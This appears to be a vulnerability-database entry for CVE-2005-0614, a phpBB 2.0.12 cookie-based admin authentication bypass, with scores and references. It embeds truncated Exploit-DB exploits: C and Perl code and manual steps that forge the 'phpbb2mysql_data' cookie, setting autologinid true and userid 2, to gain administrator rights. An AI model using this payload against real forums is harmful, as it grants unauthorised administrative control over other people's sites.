CVE-2005-0614
Published 2005-05-02
CVE-2005-0614: sessions.php in phpBB 2.0.12 and earlier allows remote attackers to gain administrator privileges via the autologinid value in a cookie.
Priority: P349 | high | 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 7.55% (93.8th percentile)
Affected
29 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpbb_group | phpbb | — | — |
No detection rules found.
Exploit-DB
phpBB 2.0.12 - Change User Rights Authentication Bypass
exploitdb·2005-03-24
---
```c
/* Paisterist's code was nice but heres mil's version.
* precompiled: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/897.rar
* Usage:
* bcc32 897.cpp
* and place the exe in your firefox profile dir.
* Usually C:\Documents and Settings\Application Data\Mozilla\Firefox\Profiles\something.default
* Visit a site with phpbb, close the browser, double click the exe, browse site.
* This gives anonymous users administrator rights only.
* Ya its lame im bored kthnx. If something goes wrong clear cookies.
*
* /str0ke
*/
#include
#include
#include
//Taken from VeNoMouS's love cow code
char *search_and_replace (char *text, char *find, char *replace)
{
char *found,*new_text;
int
len_find=strlen(find),len_r
```
Exploit-DB
phpBB 2.0.12 - Change User Rights Authentication Bypass
exploitdb·2005-03-21
---
```perl
#!/usr/bin/perl -w
# phpBB new ();
my $cookie_jar = HTTP::Cookies->new( );
$browser->cookie_jar( $cookie_jar );
$cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);
if ( defined $proxy) {
$proxy =~ s/(http:\/\/)//eg;
$browser->proxy("http" , "http://$proxy");
}
print "++++++++++++++++++++++++++++++++++++\n";
print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}
my $response = $browser->get($request);
die "Error: ", $response->status_line
unless $response->is_success;
if($response->content =~ m/phpbbprivmsg/) {
print "\n Forum is vulnerable!!!\n";
} else {
print "Sorry... Not vulnerable"; ex
```
Exploit-DB
phpBB 2.0.12 - Session Handling Authentication Bypass
exploitdb·2005-03-11
---
phpBB 2.0.12 Session Handling Authentication Bypass ..
easy to use exploit ..
** YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM..
1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made (:
3- Close the Browser ..
2- Open the cookies.txt ..((located on "C:\Documents and Settings\ALI\Application Data\Mozilla\Firefox\Profiles\ur4nn6o5.default" when using WinXP)) in example ;)
and you will find something like :
---------------------------------------------------------------------------------------------------------------\\
127.0.0.1 FALSE / FALSE 1141920503 phpbb2mysql_data a%3A0%3A%7B%7D
--------------------------------------------------------------------------------------------------------------
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=110970201920206&w=2
http://marc.info/?l=bugtraq&m=110999268130739&w=2
http://secunia.com/advisories/14413
http://www.phpbb.com/phpBB/viewtopic.php?t=267563